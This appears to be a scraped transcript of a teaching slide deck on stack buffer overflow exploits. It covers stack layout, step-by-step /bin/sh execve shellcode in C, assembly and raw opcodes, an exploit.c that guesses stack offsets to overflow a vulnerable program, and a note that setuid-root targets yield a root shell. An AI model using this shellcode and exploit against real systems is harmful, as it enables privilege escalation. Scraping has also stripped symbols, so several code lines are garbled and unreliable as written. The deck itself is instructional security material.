Buffer Overflow Exploits - PowerPoint PPT Presentation

1 / 37
About This Presentation
Title:

Buffer Overflow Exploits

Description:

A buffer overflow is a condition in a program whereby a function attempts to ... The data immediately following the buffer gets corrupted. ... – PowerPoint PPT presentation

Number of Views:487
Avg rating:3.0/5.0
Slides: 38
Provided by: gowri3
Category:

less

Transcript and Presenter's Notes

Title: Buffer Overflow Exploits


1
Buffer Overflow Exploits
  • Ch Gowri Kumar

2
Agenda
  • What is buffer overflow?
  • What happens when buffer is overflowed?
  • What is shellcode?
  • How to write shellcode?
  • How the buffer overflow can be exploited?

3
What is buffer overflow?
  • A buffer overflow is a condition in a program
    whereby a function attempts to copy more data
    into a buffer than it can hold.
  • char input "aaaaaaaaaaa")
  • char buffer4
  • strcpy(buffer, input)

4
What is buffer overflow?
  • char input "aaaaaaaaaaa")
  • char buffer4
  • strcpy(buffer, input)
  • This would cause a segmentation fault because we
    are copying 11 bytes into the buffer which can
    only hold 4. The buffer has been overflowed.

5
What happens if the buffer is overflowed?
  • The data immediately following the buffer gets
    corrupted.
  • The data immediately following may be the most
    valuable data like, stack pointer, frame pointer
    ,program return address etc
  • But what are these frame pointers, stack
    pointers, program return address.

6
Process memory organisation
  • Executable code and constant data (.text ,
    .rodata )
  • Static, global and dynamically allocated data
    (.data and .bss)
  • Local Variables, parameters, ret val address .

Lower address
Higher address
7
Stack organisation
MEMORY

0x00000000
0xFFFFFFFF
STACK
8
Example
void function (int a, int b, int c) char
buffer15 char buffer210 void main()
int x x 0 function(1,2,3) x 1
printf("d\n",x)

9
Example
MEMORY

void main() int x x 0
function(1,2,3) x 1 printf("d\n",x)

Return address
1
2
3
main() stack frame
STACK
10
Example
MEMORY

Buffer 2
Buffer 1
Old frame ptr
Return address
void function (int a, int b, int c) char
buffer15 char buffer210
1 a
2 b
3 c
main() stack frame
STACK
11
Example2
  • What is the o/p of the following program?
  • void function(int a, int b, int c)
  • char buffer15
  • char buffer210
  • int ret
  • ret buffer1 12
  • (ret) 10
  • int main()
  • int x
  • x 0
  • function(1,2,3)
  • x 1
  • printf((un)Modified d\n",x) return 144

12
What happens if the buffer is overflowed?
  • What is the result of the following code?
  • main()
  • char buffer4
  • char input "aaaaaaaaaaaaaaaa")
  • strcpy(buffer, input)

13
Demo1
14
Buffer overflow exploit
  • We can change the return address with the buffer
    overflow.
  • The next step is to change the return address to
    point to code which we want to run.
  • That can be any code. But we will look at how to
    spawn a shell, called as shellcode.
  • Lets look at what is shellcode and how to write
    the shellcode.

15
Shellcode
  • Shellcode is raw code in opcode format that will
    spawn a shell
  • Writing shellcode
  • Write shellcode in C
  • Convert the shellcode written in c to assembly
  • Find the corresponding opcodes and fill the
    buffer.

16
Shellcode in C
  • The normal and most common type of shellcode is a
    straight /bin/sh execve() call.
  • void main()
  • char name2
  • name0 "/bin/sh"
  • name1 NULL
  • execve(name0, name, NULL)

17
Shellcode in assembly
  • Invoking system calls in assembly language
  • System calls are assigned numbers defined in the
    file /usr/include/asm/unistd.h
  • Register eax need to be given the system call
    number
  • Parameters are given in ebx, ecx, edx depending
    on the system call
  • Int 0x80 is the instruction used to invoke the
    system call

18
System calls in assembly language
  • Invoking exit system call
  • The following is equivalent of exit(0)
  • xorl ebx, ebx ebx 0
  • mov 0x1, eax eax 1
  • int 0x80 interrupt

19
Shellcode in assembly
  • void main()
  • char name2
  • name0 "/bin/sh"
  • name1 NULL
  • execve(name0, name, NULL)

eax
ebx
ecx
edx
20
Shellcode in assembly
  • Have the string "/bin/sh" somewhere in memory.
  • Write the address of that into EBX.
  • Create a char which holds the address of the
    former "/bin/sh" and the address of a NULL .
  • Write the address of that char into ECX.
  • Write zero into EDX
  • Issue int 0x80 and generate the trap.

21
Shellcode in assembly
  • xorl eax,eax
  • pushl eax
  • pushl 0x68732f2f
  • pushl 0x6e69622f
  • movl esp, ebx
  • pushl eax
  • pushl ebx
  • movl esp, ecx
  • xorl edx, edx
  • movb 0xb, eax
  • int 0x80

0xb
ebx
ecx
NULL
0x.
NULL
/bin
/sh
NULL
22
Shellcode in raw opcodes
  • Convert the assembly instructions to the
    appropriate opcodes
  • char sc
  • "\x31\xc0" / xor eax, eax /
  • "\x50" / push eax /
  • "\x68\x2f\x2f\x73\x68" / push 0x68732f2f/
  • "\x68\x2f\x62\x69\x6e" / push 0x6e69622f/
  • "\x89\xe3" / mov esp,ebx /
  • "\x50 / push eax /
  • "\x53 / push ebx /
  • "\x89\xe1" / mov esp,ecx /
  • "\x31\xd2" / xor edx,edx /
  • "\xb0\x0b" / mov 0xb,al /
  • "\xcd\x80" / int 0x80 /

23
Running the shellcode
  • char sc .../shell opcode/
  • main()
  • void (fp) (void)
  • fp (void )sc
  • fp()

24
Demo2
25
Buffer overflow exploit
  • We can change the return address with the buffer
    overflow.
  • We now have shellcode ready.
  • The next step is to change the return address to
    point to the shellcode we have.

26
Example
  • char sc
  • char large_string128
  • void main()
  • char buffer96
  • int i
  • long long_ptr (long ) large_string
  • / fill large_string with addr of buffer/
  • for (i 0 i lt 32 i)
  • (long_ptr i) (int) buffer
  • / copy the shell code to the long string/
  • for (i 0 i lt strlen(shellcode) i)
  • large_stringi shellcodei
  • /copy it to buffer /
  • strcpy(buffer,large_string)

27
Example
28
Buffer overflow exploit
  • But the previous example is about overflowing the
    program itself.
  • We want to overflow the buffer of some other
    program.
  • But for other program how do we know what the
    address of the buffer would be.

29
Buffer overflow exploit
  • For every program the stack will start at the
    same address.
  • Most programs do not push more than a few hundred
    or a few thousand bytes into the stack at any one
    time.
  • Therefore by knowing where the stack starts we
    can try to guess where the buffer we are trying
    to overflow will be.

30
Buffer overflow exploit
  • Here is a little program that will print its
    stack
  • unsigned long get_sp(void)
  • __asm__("movl esp,eax")
  • void main()
  • printf("0xx\n", get_sp())

31
Buffer overflow exploit
  • Lets assume this is the program we are trying to
    overflow is
  • void main(int argc, char argv)
  • char buffer512
  • if (argc gt 1)
  • strcpy(buffer,argv1)

32
Buffer overflow exploit
  • We can create a program that takes as a parameter
    a buffer size, and an offset from its own stack
    pointer (where we believe the buffer we want to
    overflow may live)

33
exploit.c
  • offset atoi(argv1) / get the offset they
    specified /
  • esp sp() / get the stack
    pointer /
  • ret esp-offset / sp - offset return
    address /
  • ptr buffer
  • addr_ptr (long )ptr
  • for(i0 iltBUFFERSIZE i4)
  • (addr_ptr) ret
  • for(i0 iltstrlen(sc) i)
  • (ptr) sci
  • bufferBUFFERSIZE-1 0
  • execl("./vulnerable", "vulnerable", buffer, 0)

34
Demo3
35
Buffer overflow exploit
  • If the owner of the program is root and
  • If the setuid bit is set then the shell which is
    spawn will become the root shell.

36
Demo4
37
References
  • http//www.enderunix.org/docs/eng/bof-eng.txt
  • http//www.enderunix.org/documents/en/sc-en.txt
  • http//www.phrack.com/phrack/57/p57-x05
Write a Comment
User Comments (0)
About PowerShow.com